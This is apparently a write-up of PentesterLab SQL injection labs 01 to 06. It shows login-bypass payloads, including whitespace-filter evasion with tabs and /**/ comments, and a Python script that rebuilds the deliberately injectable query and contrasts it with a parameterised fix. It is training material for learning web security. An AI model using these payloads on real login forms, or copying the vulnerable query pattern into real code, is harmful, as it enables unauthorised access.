PentesterLab SQL Injection Labs (Part 1)
by e1ec30
SQL Injection 01
We are greeted with a plain-looking login page:

The challenge description contains the SQL query (and frankly most of the solution lol), so we know it looks like:
SELECT * FROM user WHERE login='[USER]' and password='[PASSWORD]'
So we try the most basic injection payload in both fields:
' OR 1=1-- 
Note the trailing space: in MySQL the -- marker only starts a comment when it is followed by whitespace. Everything after it, including the closing quote and the whole password check, is ignored, so the condition becomes login='' OR 1=1, which is true for every row.

and that solves the lab, cool :)

SQL Injection 02
The challenge description is a bit vaguer this time, so let's launch the instance:

Well, it looks exactly like SQL Injection 01, so let's try the same payload:

Hmm, no luck...
Well, the challenge description did mention something about double quotes. If the query wraps the values in double quotes, a single quote is just another character inside the string literal and never closes it, so the same payload with the quote swapped (" OR 1=1-- ) should work. Let's try that:

And that solves it, Yay :)

SQL Injection 03
The challenge prompt:

So it seems the developer is checking whether the query returns exactly one row. With our previous payloads every row comes back, because the condition 1=1 is always true. But let's try anyway:

So how do we get around that?
Well, the prompt gave us a hint: LIMIT. A quick Google search shows that LIMIT n restricts a query to its first n matching rows, so appending LIMIT 1 to the injected condition, before the comment marker (' OR 1=1 LIMIT 1-- ), makes the query return a single row and passes the check. Which row that is depends on the table's default ordering, but the check only counts rows, so it doesn't matter here.
Let’s try:

Aaaand it works!!!

Nice :)
SQL Injection 04
First, the prompt:

This means our payload can't contain any spaces, and sure enough, when we try it:


But the prompt also suggests using tabs, so let's try that. Pressing the Tab key in the input fields doesn't insert a tab (the browser moves focus to the next field instead), so how do we get tabs into our input?
You can use an intercepting proxy like Burp to edit the request and change the spaces to tabs, but I just decided to use the HackBar Chrome extension:

The URL-encoded form of the tab character (\t) is %09 (highlighted in yellow). MySQL's parser treats a tab as whitespace, so it separates keywords exactly as a space would, and it also counts as the whitespace that the -- comment marker requires after it.
Click on Execute and…

We log in!!! Sweet :)
SQL Injection 05
As usual, the prompt:

It seems the developer also blocked tabs this time around, so our previous payload won't work. But the prompt also hinted that we might not need whitespace at all, so what can we put between keywords?
Let’s think about this a little: what we need is something that
- Is not a whitespace character, so no spaces or tabs
- Will separate our keywords, and
- Will not change the meaning of our query, meaning it will be ignored by the SQL interpreter (or engine, whatever)
Now, if you know something about programming, you'll know there's a name for number 3: a comment. That's what we are going to use in our payload, because comments satisfy all three criteria. From a quick Google search, we learn that MySQL supports block comments written /* ... */ (an empty one is just /**/), which the parser treats as whitespace, and line comments starting with # (MySQL-specific) or with -- followed by whitespace, which run to the end of the line.
So our payload will look something like:
'/**/OR/**/1=1/**/#
When we try it:

It works!!
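To make the five bypasses above concrete, here is an added example (my own code, not PentesterLab's and not from the labs): a Python script that rebuilds each lab's login check against an in-memory SQLite table, runs the corresponding payload through it, and then runs the same payloads through a parameterised query to show why that is the fix. The table contents, the filter logic and the helper names are assumptions standing in for the lab's real backend; the payloads end the statement with -- instead of the writeup's #, because SQLite (used here so the script runs offline) does not treat # as a comment while MySQL accepts both.

```python
import sqlite3
from urllib.parse import unquote

# Constructed stand-in for the lab's user table. The labs run MySQL; SQLite is
# used here so the example runs offline. Rows and passwords are made up.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE user (id INTEGER, login TEXT, password TEXT)")
    con.executemany("INSERT INTO user VALUES (?, ?, ?)",
                    [(1, "admin", "s3cret"), (2, "alice", "wonderland"),
                     (3, "bob", "builder")])
    return con

def vulnerable_login(con, user, password, quote="'", single_row=False, blocked=()):
    """String-concatenated login check, built the way the lab prompts describe it.

    quote      -- the quote character the developer wraps the values in (' or ")
    single_row -- reject unless exactly one row comes back (lab 03)
    blocked    -- characters the developer refuses in the input (labs 04 and 05)
    Returns (logged_in, detail): detail is the query that ran or why it was refused.
    """
    for ch in blocked:
        if ch in user or ch in password:
            return False, f"input rejected: contains {ch!r}"
    query = (f"SELECT * FROM user WHERE login={quote}{user}{quote} "
             f"and password={quote}{password}{quote}")
    try:
        rows = con.execute(query).fetchall()
    except sqlite3.Error as exc:
        return False, f"sql error: {exc}"
    if single_row and len(rows) != 1:
        return False, f"{len(rows)} rows returned, expected exactly 1"
    return len(rows) > 0, query

def safe_login(con, user, password):
    """The fix: bind the values as parameters, so quotes and comment markers
    in the input are data, never SQL syntax."""
    rows = con.execute("SELECT * FROM user WHERE login=? and password=?",
                       (user, password)).fetchall()
    return len(rows) == 1

# One entry per lab: (name, keyword arguments for the developer's check, payload
# typed into the login field). Lab 04's payload is given URL-encoded, as it was
# sent through HackBar: %09 decodes to a tab.
LABS = [
    ("01 single quotes",           {},                        "' OR 1=1-- "),
    ("02 double quotes",           {"quote": '"'},            '" OR 1=1-- '),
    ("03 exactly one row",         {"single_row": True},      "' OR 1=1 LIMIT 1-- "),
    ("04 spaces blocked",          {"blocked": (" ",)},       unquote("'%09OR%091=1--%09")),
    ("05 spaces and tabs blocked", {"blocked": (" ", "\t")},  "'/**/OR/**/1=1/**/--"),
]

def run_labs(con):
    """Run each lab's payload against its check; returns {lab name: logged_in}."""
    return {name: vulnerable_login(con, payload, "x", **opts)[0]
            for name, opts, payload in LABS}

if __name__ == "__main__":
    db = make_db()
    for name, opts, payload in LABS:
        ok, detail = vulnerable_login(db, payload, "x", **opts)
        print(f"lab {name}: {'bypassed' if ok else 'refused'}: {detail}")
    # the same payloads against the parameterised query never log anyone in
    print("parameterised:", [safe_login(db, p, "x") for _, _, p in LABS])
```

Feeding the lab 01 payload into the double-quoted query of lab 02, or the lab 03 payload without LIMIT 1 into the single-row check, makes the script report "refused" with the reason, which mirrors the failed attempts in the writeup.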

SQL Injection 06
The prompt:

Well, here the description tells us everything we need to know to solve the lab. I also read the linked blog post to further understand how it works.
We try the payload:

And we're in:
